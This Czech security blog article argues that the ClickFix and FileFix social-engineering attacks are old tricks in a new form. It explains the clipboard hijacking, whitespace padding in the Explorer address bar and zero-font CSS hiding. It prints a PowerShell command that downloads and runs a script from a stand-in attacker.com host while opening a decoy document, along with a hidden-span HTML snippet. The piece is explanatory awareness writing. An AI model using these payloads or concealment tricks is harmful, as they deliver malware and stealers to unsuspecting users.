Slogan Glitch Effect with Random Timing

ClickFix a FileFix nejsou v zásadě nic nového

Publikováno: 08. 08. 2025, v rubrice: Bezpečnost, autor: , zobrazeno: 400x
🕒 3 min čtení

Bezpečnostní firmy a média se v posledních měsících předhánějí, kdo silněji varuje před „novými“ technikami zvanými ClickFix a FileFix.

Ale když se na ně podíváme blíže, zjistíme, že tyto útoky jsou jen další variací dávno známých sociálně-inženýrských principů.

Tak v čem je ten objev?

ClickFix i FileFix využívají psychologii. Donutí uživatele něco zkopírovat a spustit, čímž si sám aktivuje škodlivý kód.

  • ClickFix využívá dialog Win+R nebo macOS Terminal.
  • FileFix zneužívá adresní řádek ve Windows Exploreru, který stejně jako příkazová řádka dokáže vykonat příkaz.

To má být údajně „nová úroveň útoku“. Jenže světě div se…

Nejde o nic nového. Fakt, vážně.

Zkopírování příkazu do schránky pomocí JavaScriptu je tu s námi od doby, co existuje clipboard API. Tvrdit, že „útok je sofistikovanější než kdy dřív“, je marketingová nadsázka. Je to pořád ta samá stará past, jen s přívětivým rozhraním. Útok funguje jednoduše. Stránka nabídne cestu k dokumentu, tlačítko zkopíruje PowerShell příkaz do schránky, oběť ho vloží do Průzkumníka a tím ho vykoná. Vizuálně to vypadá třeba takto:

\intranet\směrnice.docx

Ale reálně se vloží něco jako:

powershell -w hidden -c „škodlivý_kód“ # \intranet\směrnice.docx

Dlouhá řada mezer mezi příkazem a komentářem způsobí, že uživatel vidí jen konec. Komentář a začátek s příkazem zůstane mimo zorné pole adresního řádku.

A ano, bude hůř. Se zero font.

Na rozdíl od FileFix a ClickFix je technika zero font opravdu důmyslná.

Uživatel nic nekliká. Jen označí text, který vypadá jako běžná síťová cesta, a zkopíruje ho. Ale ve skutečnosti zkopíruje neviditelný příkaz skrytý pomocí CSS stylu font-size:0. Například HTML kód může vypadat takto:

<span style=“font-size:0″>powershell -w hidden -c „…“</span>\intranet\směrnice.docx

Oběť vidí jen tu druhou část (\intranet\…), ale schránka obsahuje celý PowerShell příkaz.

Tento trik nepotřebuje žádný JavaScript ani tlačítko.

A dokument se opravdu otevře

Pokud po spuštění nic neproběhne, oběť může zpozornět. Správně navržený útočný skript by měl nejen provést škodlivou akci, ale zároveň i otevřít očekávaný dokument. Například:

powershell -w hidden -c „IEX(New-Object Net.WebClient).DownloadString(‚http://attacker.com/rev.ps1‘); Start-Process ‚\intranet\směrnice.docx'“

Tím se vytvoří důvěryhodná zkušenost: „Aha, otevřel se dokument, vše v pořádku.“

Tyhle triky známe víc než 10 let

Falešné dokumenty a decoy files? To je praxe stará víc než dekádu.Ale chápu, že noví analytici nad tím žasnou. Fakt je, že současné kampaně „ClickFix“ (od Q4 2024) a „FileFix“ (Q2 2025) přidaly hned několik praktických vylepšení: zneužívají nové místo, kam příkaz vložit (adresní řádek Průzkumníka), daleko menší počet kliků díky automatickému kopírování přes Clipboard API a multiplatformní variantu pro macOS. A navíc se staly hlavním doručovacím kanálem ransomwaru Interlock, stealeru Lumma a Atomic macOS Stealer.

Závěr: ClickFix a FileFix nejsou žádné revoluční novinky. Jen upravená forma klasického podvodu, kde uživatel udělá vše sám. Klikne, zkopíruje, vloží a spustí. Opravdovou hrozbou je to, co uživatel vůbec nevidí. Zero font, dlouhé mezery, falešná cesta, která zakrývá škodlivý příkaz. Pokud k tomu připočteme automatické otevření legitimního dokumentu, máme před sebou podvod, který na první pohled vypadá jako běžná firemní operativa. Ale nenechme se mýlit. Technologicky to není nic nového. Jediné, co se mění, je lidská nepozornost. A tu útočníci zneužívají stále stejně.

QR kód pro podporu

Pokud se vám líbí naše články, tak zvažte podporu naši práce – Naskenujte QR kód a přispějte libovolnou částkou.

Děkujeme!

Pro citování tohoto článku ve své vlastní práci můžete použít následující odkaz:
ČERMÁK, Miroslav. ClickFix a FileFix nejsou v zásadě nic nového. Online. Clever and Smart. 2025. ISSN 2694-9830. Dostupné z: https://www.cleverandsmart.cz/clickfix-a-filefix-nejsou-v-zasade-nic-noveho/. [cit. 2025-12-11].

Pokud vás tento článek zaujal, můžete odkaz na něj sdílet.
Související články:
  1. Čtečka otisků prstů navzdory svému prolomení zvyšuje bezpečnost nového iPhonu
  2. Bezpečnostní strategii firem v zásadě vytvářejí média
  3. Rozpoznávání obličeje navzdory svému prolomení nesnižuje bezpečnost nového iPhonu
  4. Nový bezsouborový malware DNSmessenger
  5. Ransom32 aneb první multiplatformní javascriptový ransomware

Štítky:

K článku se zde nenachází žádný komentář – buďte první.

Diskuse na tomto webu je moderována. Pod článkem budou zobrazovány jen takové komentáře, které nebudou sloužit k propagaci konkrétní firmy, produktu nebo služby. V případě, že chcete, aby z těchto stránek vedl odkaz na váš web, kontaktujte nás, známe efektivnější způsoby propagace.

Text vaší reakce:

 

Tento web používá Akismet k omezení spamu. Podívejte se, jak data z komentářů zpracováváme.

Autor článku

Miroslav Čermák

Expert na řízení informační bezpečnosti a kybernetických rizik

veřejný profil